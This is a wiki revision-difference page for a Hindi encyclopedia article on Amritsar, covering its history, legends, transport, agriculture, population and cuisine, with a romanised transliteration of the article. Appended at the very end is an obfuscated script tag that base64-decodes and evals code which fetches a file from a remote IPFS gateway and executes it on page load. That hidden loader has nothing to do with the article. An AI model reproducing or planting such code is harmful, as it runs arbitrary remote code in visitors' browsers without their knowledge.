Difference between revisions of "अमृतसर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 6: Line 6:
 
1849 में अमृतसर को ब्रिटिश भारत में मिला दिया गया। 13 अप्रैल 1919 को शहर के जिस [[जलियांवाला बाग़]] में एक राजनीतिक सभा पर ब्रिटिश सेना ने अंधाधुंध गोलियां चलाकर 379 लोगों की हत्या कर दी थी तथा इससे भी अधिक लोगों को घायल कर दिया था, उसे अब राष्ट्रीय स्मारक बना दिया गया है। 1984 में अमृतसर में एक और हिंसक राजनीतिक संघर्ष हुआ, जब स्वर्ण मंदिर में मोर्चाबंद सैकड़ों सिक्ख अलगाववादियों पर भारतीय सेना ने हमला किया। परस्पर विरोधी सूत्रों के अनुसार, इस संघर्ष में 450 से 1,200 लोग मारे गये थे।  
 
1849 में अमृतसर को ब्रिटिश भारत में मिला दिया गया। 13 अप्रैल 1919 को शहर के जिस [[जलियांवाला बाग़]] में एक राजनीतिक सभा पर ब्रिटिश सेना ने अंधाधुंध गोलियां चलाकर 379 लोगों की हत्या कर दी थी तथा इससे भी अधिक लोगों को घायल कर दिया था, उसे अब राष्ट्रीय स्मारक बना दिया गया है। 1984 में अमृतसर में एक और हिंसक राजनीतिक संघर्ष हुआ, जब स्वर्ण मंदिर में मोर्चाबंद सैकड़ों सिक्ख अलगाववादियों पर भारतीय सेना ने हमला किया। परस्पर विरोधी सूत्रों के अनुसार, इस संघर्ष में 450 से 1,200 लोग मारे गये थे।  
 
----
 
----
किंवदन्ती है, कि [[रामायण]] काल में अमृतसर के स्थान पर एक घना वन था, जहाँ एक सरोवर भी स्थित था। [[राम|श्रीरामचन्द्र]] के पुत्र [[लवकुश|लव]] और [[लवकुश|कुश]] आखेट के लिए एक बार यहाँ पर आकर सरोवर के तीर पर कुछ समय के लिए ठहरे थे। ऐतिहासिक समय में सिक्खों के आदिगुरु नानक ने भी इस स्थान के प्राकृतिक सौंन्दर्य से आकृष्ट होकर यहाँ कुछ देर के लिए एक वृक्ष के नीचे विश्राम तथा ध्यान किया था। यह वृक्ष वर्तमान सरोवर के निकट आज भी दिखाया जाता है। तीसरे गुरु रामदास ने नानकदेव का इस स्थान से सम्बन्ध होने के कारण यहाँ एक मन्दिर बनवाने का विचार किया। 1564 ई. में चौथे गुरु रामदास ने वर्तमान अमृतसर नगर की नींव डाली और स्वयं भी यहाँ पर आकर रहने लगे। इस समय इस नगर को रामदासपुर या चक-रामदास कहते थे। 1577 में मुग़ल सम्राट [[अकबर]] ने रामदास को 500 बीघा भूमि नगर को बसाने के लिए दी, जो उन्होंने तुंग के ज़मीदारों को 700 रुपये अकबरी देकर खरीदी। कहा जाता है, कि सरोवर के पवित्र जल में स्नान करने से एक कौवे के पर श्वेत हो गए थे और कोढ़ी का रोग जाता रहा था। इस दन्तकथा से आकृष्ट होकर सहस्रों लोग यहाँ आने-जाने लगे और नगर की आबादी भी बढ़ने लगी। 1589 ने [[गुरु अर्जुन देव]] के एक शिष्य शेखमियां मीर ने सरोवर के बीच में स्थित वर्तमान स्वर्ण-मन्दिर की नींव डाली। मन्दिर के चारों ओर चार दरवाज़ों का प्रबन्ध किया गया था। यह [[नानक देव, गुरु|गुरु नानक]] के उदार धार्मिक विचारों का प्रतीक समझा गया। मन्दिर में गुरु-ग्रंथ-साहिब की, जिसका संग्रह गुरु अर्जुन देव ने किया था, स्थापना की गई थी। सरोवर को गहरा करवाने और परिवर्धित करने का कार्य बाबू बूढ़ा नामक व्यक्ति को सौंपा गया था और इन्हें ही ग्रंथ-साहब का प्रथम ग्रंथी बनाया गया।
+
किंवदन्ती है, कि [[रामायण]] काल में अमृतसर के स्थान पर एक घना वन था, जहाँ एक सरोवर भी स्थित था। [[राम|श्रीरामचन्द्र]] के पुत्र [[लवकुश|लव]] और [[लवकुश|कुश]] आखेट के लिए एक बार यहाँ पर आकर सरोवर के तीर पर कुछ समय के लिए ठहरे थे। ऐतिहासिक समय में सिक्खों के आदिगुरु नानक ने भी इस स्थान के प्राकृतिक सौंन्दर्य से आकृष्ट होकर यहाँ कुछ देर के लिए एक वृक्ष के नीचे विश्राम तथा ध्यान किया था। यह वृक्ष वर्तमान सरोवर के निकट आज भी दिखाया जाता है। तीसरे गुरु रामदास ने नानकदेव का इस स्थान से सम्बन्ध होने के कारण यहाँ एक मन्दिर बनवाने का विचार किया। 1564 ई. में चौथे गुरु रामदास ने वर्तमान अमृतसर नगर की नींव डाली और स्वयं भी यहाँ पर आकर रहने लगे। इस समय इस नगर को रामदासपुर या चक-रामदास कहते थे। 1577 में मुग़ल सम्राट [[अकबर]] ने रामदास को 500 बीघा भूमि नगर को बसाने के लिए दी, जो उन्होंने तुंग के ज़मीदारों को 700 रुपये अकबरी देकर खरीदी। कहा जाता है, कि सरोवर के पवित्र जल में स्नान करने से एक कौवे के पर श्वेत हो गए थे और कोढ़ी का रोग जाता रहा था। इस दन्तकथा से आकृष्ट होकर सहस्रों लोग यहाँ आने-जाने लगे और नगर की आबादी भी बढ़ने लगी।  
1757 ई. में वीर सरदार बाबा दीपसिंह जी ने मुसलमानों के अधिकार से इस मन्दिर को छुड़ाया, किन्तु वे उनके साथ लड़ते हुए वीरगति को प्राप्त हुए। उन्होंने अपने अधकटे सिर को सम्भालते हुए अनेक शत्रुओं को मौत के घाट उतारा। उनकी दुधारी तलवार मन्दिर के संग्रहालय में सुरक्षित है। स्वर्ण-मन्दिर के निकट बाबा अटलराय का गुरुद्वारा है। ये छठे गुरु हरगोविन्द के पुत्र थे, और नौ वर्ष की आयु में ही सन्त समझे जाने लगे थे। उन्होंने इतनी छोटी-सी उम्र में एक मृत शिष्य को जीवन दान देने में अपने प्राण होम दिए थे। कहा जाता है, कि गुरुद्वारे की नौं मन्ज़िलें इस बालक की आयु की प्रतीक हैं। पंजाब-केसरी महाराज रणजीतसिंह ने स्वर्ण-मन्दिर को एक बहुमूल्य पटमण्डप दान में दिया था, जो संग्रहालय में है। वास्तव में राणजीत सिंह की सहायता से ही मन्दिर अपने वर्तमान रूप को प्राप्त कर सका। इसके शिखर पर सुवर्णपत्र चढ़वाने का श्रेय भी उन्हीं को दिया जाता है। 1919 को जलियाँवाला बाग़ की घटना के कारण अमृतसर का नाम [[भारत]] के इतिहास में भी चिरस्थायी हो गया है।
 
 
==यातायात और परिवहन==
 
==यातायात और परिवहन==
  

Revision as of 10:55, 24 June 2010

amritasar shahar, zile ka prashasanik mukhyalay, panjab rajy, pashchimottar bharat mean sthit hai. amritasar pakistani sima par, panjab ka sabase b da nagar hai. yah guroo ramadas ka dera hua karata tha. amritasar anek trasadiyoan aur dardanak ghatanaoan ka gavah raha hai. bharatiy svatantrata sangram ka sabase bada narasanhar amritasar ke jaliyaanvala bag mean hi hua tha. isake bad bharat-pakistan ke bich jo bantavara hua us samay bhi amritasar mean bada hatyakaand hua. yahian nahian aphagan aur mugal shasakoan ne isake oopar anek akraman kie aur isako barbad kar diya. isake bavajood sikkhoan ne apane dridh sankalp aur majaboot ichchhashakti se dobara isako basaya. halaanki amritasar mean samay ke sath kaphi badalav ae haian lekin aj bhi amrisatar ki garima barakarar hai. yah apani sanskriti aur l daiyoan ke lie bahut prasiddh raha hai. amritasar bhi ek lokapriy paryatak sthal hai. tajamahal ke bad sabase jyada paryatak amritasar ke svarn mandir ko hi dekhane ate haian.

sthapana

sima se lagabhag 50 kimi door sthit amritasar ek pramukh vyaparik v saanskritik keandr hai. 1577 mean sikkhoan ke chauthe guru ramadas ne amrit saras namak ek pavitr sarovar, jisake nam par is shahar ka namakaran hua, ke kinare amritasar ki sthapana ki thi. is talab ke thik madhy mean tapoo par ek mandir banaya gaya tha, jisake taanbe ke guanbad ko bad mean svarn-pataroan se madh diya gaya, is mandir ka nam haramandir sahab ya svarn mandir rakha gaya. ab amritasar sikkh dharm ka keandr ban gaya hai. ubharati huee sikkh shakti ke keandr ke sath-sath yah shahar vyapar ke kshetr mean bhi mahattvapoorn banata gaya.

itihas

1849 mean amritasar ko british bharat mean mila diya gaya. 13 aprail 1919 ko shahar ke jis jaliyaanvala bag mean ek rajanitik sabha par british sena ne aandhadhuandh goliyaan chalakar 379 logoan ki hatya kar di thi tatha isase bhi adhik logoan ko ghayal kar diya tha, use ab rashtriy smarak bana diya gaya hai. 1984 mean amritasar mean ek aur hiansak rajanitik sangharsh hua, jab svarn mandir mean morchaband saik doan sikkh alagavavadiyoan par bharatiy sena ne hamala kiya. paraspar virodhi sootroan ke anusar, is sangharsh mean 450 se 1,200 log mare gaye the.


kianvadanti hai, ki ramayan kal mean amritasar ke sthan par ek ghana van tha, jahaan ek sarovar bhi sthit tha. shriramachandr ke putr lav aur kush akhet ke lie ek bar yahaan par akar sarovar ke tir par kuchh samay ke lie thahare the. aitihasik samay mean sikkhoan ke adiguru nanak ne bhi is sthan ke prakritik sauanndary se akrisht hokar yahaan kuchh der ke lie ek vriksh ke niche vishram tatha dhyan kiya tha. yah vriksh vartaman sarovar ke nikat aj bhi dikhaya jata hai. tisare guru ramadas ne nanakadev ka is sthan se sambandh hone ke karan yahaan ek mandir banavane ka vichar kiya. 1564 ee. mean chauthe guru ramadas ne vartaman amritasar nagar ki nianv dali aur svayan bhi yahaan par akar rahane lage. is samay is nagar ko ramadasapur ya chak-ramadas kahate the. 1577 mean mugal samrat akabar ne ramadas ko 500 bigha bhoomi nagar ko basane ke lie di, jo unhoanne tuang ke zamidaroan ko 700 rupaye akabari dekar kharidi. kaha jata hai, ki sarovar ke pavitr jal mean snan karane se ek kauve ke par shvet ho ge the aur kodhi ka rog jata raha tha. is dantakatha se akrisht hokar sahasroan log yahaan ane-jane lage aur nagar ki abadi bhi badhane lagi.

yatayat aur parivahan

vayu marg
amritasar ka raja saansi havaee adda dilli se achchhi tarah juda hua hai.

rel marg
dilli se tatanagar-jammootavi eksaprais aur goldan tempal mel (svarn mandir eksaprais) dvara asani se amritasar relave steshan pahuancha ja sakata hai.

sadak marg

  • apani kar se bhi graiand trank [ji.ti.] rod dvara asani se amritasar pahuancha ja sakata hai.
  • isake alava dilli ke kashmiri get bas adde se bhi amritasar ke lie basean jati haian.

krishi aur khanij

5,088 varg kimi kshetr mean phaile amritasar zile ki bhoomi lagabhag samataliy hai, jo ravi v vyas nadiyoan dvara apavahit hoti hai. poori tarah se shushk jalavayu hone ke karan is shahar ki kheti sianchaee par nirbhar hai, jo mukhyat: apari bari doab nahar pranali se ki jati hai. gehooan, kapas, dalahan v makka yahaan ki mukhy fasalean haian.

udyog aur vyapar

amritasar ke vividh udyogoan mean vastr, khady nirman v prasanskaran, resham bunaee, charmashodhan v dabba paikiang udyog shamil haian.

shikshan sansthan

medikal k aaulej ke alava amritasar mean deantal, kala v ianjiniyariang k aaulej haian aur isake thik bahar khalasa k aaulej (1899 mean sthapit) hai.

janasankhya

amritasar nagar nigam kshetr ki (2001 ki janaganana ke anusar) kul janasankhya 9,75,695 aur amritasar zile ki kul janasankhya 30,74,207 hai.

khanapan

amritasar ke vyanjan poore vishv mean prasiddh haian. yahaan ka bana chikan, makke ki roti, sarasoan ka sag aur lassi bahut prasiddh hai. amritasar panjab mean sthit hai. khane-pine ke shaukin logoan ke lie panjab svarg mana jata hai. darabar sahib ke darshan karane ke bad adhikatar shraddhalu bhije bhathur, rasili jalebi aur any vyanjanoan ka anand lene ke lie bharavan ke dhabe par jate haian. yahaan ki speshal thali bhi bahut prasiddh hai. isake alava lareans rod ki tikki, aloo-poori aur aloo paraanthe bahut prasiddh haian.

adhikarik vebasait

sambandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>